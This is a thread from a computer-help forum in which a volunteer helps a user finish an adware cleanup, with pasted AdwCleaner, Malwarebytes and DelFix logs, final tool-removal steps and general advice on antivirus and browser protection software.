  • Local time:12:50 PM

Posted 03 November 2016 - 05:59 PM

Okay, here is the log from the AdwCleaner

 

# AdwCleaner v6.030 - Logfile created 02/11/2016 at 20:11:15
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-02.1 [Server]
# Operating System : Windows 10 Home  (X64)
# Username : Harold - FAMILY-HP
# Running from : C:\Users\Harold\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****



***** [ Files ] *****

[-] File deleted: C:\END
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk
[-] File deleted: C:\WINDOWS\Reimage.ini


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\gamingwonderland.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mywebface.com
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
[-] Key deleted: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKLM\SOFTWARE\Conduit
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\inbox.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\inbox.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [2360 Bytes] - [02/11/2016 20:11:15]
C:\AdwCleaner\AdwCleaner[S0].txt - [2548 Bytes] - [02/11/2016 20:03:05]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [2506 Bytes] ##########
 

 

And here is the log from Malwarebytes Anti-Malware

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/3/2016
Scan Time: 4:55 PM
Logfile: Anti-Malware log.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.03.14
Rootkit Database: v2016.10.31.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Harold

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 452772
Time Elapsed: 57 min, 29 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 2
PUP.Optional.Yontoo, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Update neurowise, Quarantined, [787215a6faa089ad56de8c536e95fb05],
PUP.Optional.Yontoo, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Util neurowise, Quarantined, [7b6f7d3e49518babfa3ab728a75c1ee2],

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



#12 dbrisendine

dbrisendine

  • Malware Response Team
  • 508 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 04 November 2016 - 02:09 AM

Those look good; mostly inactive, latent settings from past malware / adware.  How is your system running?


unite_blue_zpsba2e96f7.png
 
Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#13 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:12:50 PM

Posted 04 November 2016 - 05:04 PM

System seems to be running pretty well. I haven't used it much other than to perform the actions you told me to do. I've been waiting for the all clear from you. The performance seems much improved too.

 

So, do you think it all clear?



#14 dbrisendine

dbrisendine

  • Malware Response Team
  • 508 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 05 November 2016 - 02:56 AM

All right!! :bananas: Your logs are clean and you're good to go now!! :thumbup2: We've got some final steps left to do to clean up our tools and get your system in good running condition and then you are on your way. I must say though, even though we met through less than ideal circumstances, it has been really great to work with you. :) Just run through the steps from the Cleanup of Tools to the Program Update Checker. That's it. Thanks. :cool:


Clean up of Malware Removal Tools
Now that we are through using these tools, let's clean them off your system so that should you ever need to have malware removed again (we hope not) fresh, updated copies will be downloaded.

  • Download Delfix from here
    to your desktop and double click it to start the program
  • Ensure Remove disinfection tools is ticked
    Also tick:
  • Activate UAC
  • Create registry backup
  • Purge system restore
  • Reset system settings
  • DelFixSelectall_zps0f04cec4.png
  • Click Run
  • The program will run for a few moments and then notepad will open with a log. Please paste the log in your next reply.

You can delete any log files left on your desktop as these are no longer needed.


You are now done! :thumbup2: :grinner: :thumbup2: :grinner: :smilers:

Now some information on programs to help keep you safe:

First, an Antivirus program. You NEED one; free is just as good as paid-for as long as you keep them updated. ONLY use one at a time as having more than that will cause system problems. Here are some free ones to check out:
Microsoft Security Essentials
Avast! Free Antivirus

Next, a firewall is a must have now-a-days. The built in firewall in Windows 7 (and above) is fine (just make sure it is turned on (Start > Control Panel > Windows Firewall)).

=== options ====
Unchecky is a small service that runs in the background to help keep those "extra toolbars" and tag along search engines from automatically installing. By automatically directing you to a custom install with all the options unchecked, only what you manually choose and confirm gets installed.

CryptoPrevent is a free program that prevents CryptoLocker / ransomware from infecting your PC by locking down the OS so the malware can not get a grip on your system. You can read the details about this program here.

Also, consider adding MalwareBytes Antimalware to your arsenal of safe keeping programs. Use the free version (not the paid or trial version) and you won't have a problem with your antivirus scanner program. Keep it updated and run a scan with it once a week.

Lastly, if you use Firefox as your main web browser, consider adding the NoScript and  uBlock Origin add-ons to the browser to block scripting hijacks and remove unwanted ads from the pages you view.

You may also find some information and tips at this thread:
How did I get infected in the first place?
and
COMPUTER SECURITY - a short quide to staying safer online

_____________________________________________________________________

Please come back and paste the DelFix.txt log when you can. After that, if you have no more questions, you are good to go. Surf safe, my friend!!
 

 


unite_blue_zpsba2e96f7.png
 
Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#15 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:12:50 PM

Posted 06 November 2016 - 06:59 AM

Okay, below is the DelFix log file. I really appreciate all of your help and your quick response time! My system seems to be running really well again! YOU ROCK!!!! Thanks so much!!!! Just one other question. A friend recommended running "Ccleaner" once a week on my system too. Any experience with it? Recommended or not really? Thanks again!!!! # DelFix v1.010 - Logfile created 06/11/2016 at 06:44:45 # Updated 26/04/2015 by Xplode # Username : Harold - FAMILY-HP # Operating System : Windows 10 Home (64 bits) ~ Activating UAC ... OK ~ Removing disinfection tools ... Deleted : C:\FRST Deleted : C:\AdwCleaner Deleted : C:\Users\Harold\Desktop\FRST-OlderVersion Deleted : C:\log.txt Deleted : C:\Users\Harold\Desktop\Addition.txt Deleted : C:\Users\Harold\Desktop\AdwCleaner.exe Deleted : C:\Users\Harold\Desktop\AdwCleaner[C0].txt Deleted : C:\Users\Harold\Desktop\Fixlog.txt Deleted : C:\Users\Harold\Desktop\FRST.txt Deleted : C:\Users\Harold\Desktop\FRST64.exe Deleted : C:\Users\Harold\Desktop\Rkill.txt ~ Creating registry backup ... OK ~ Cleaning system restore ... Deleted : RP #14 [Removed iTunes | 11/05/2016 12:32:51] New restore point created ! ~ Resetting system settings ... OK ########## - EOF - ##########




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users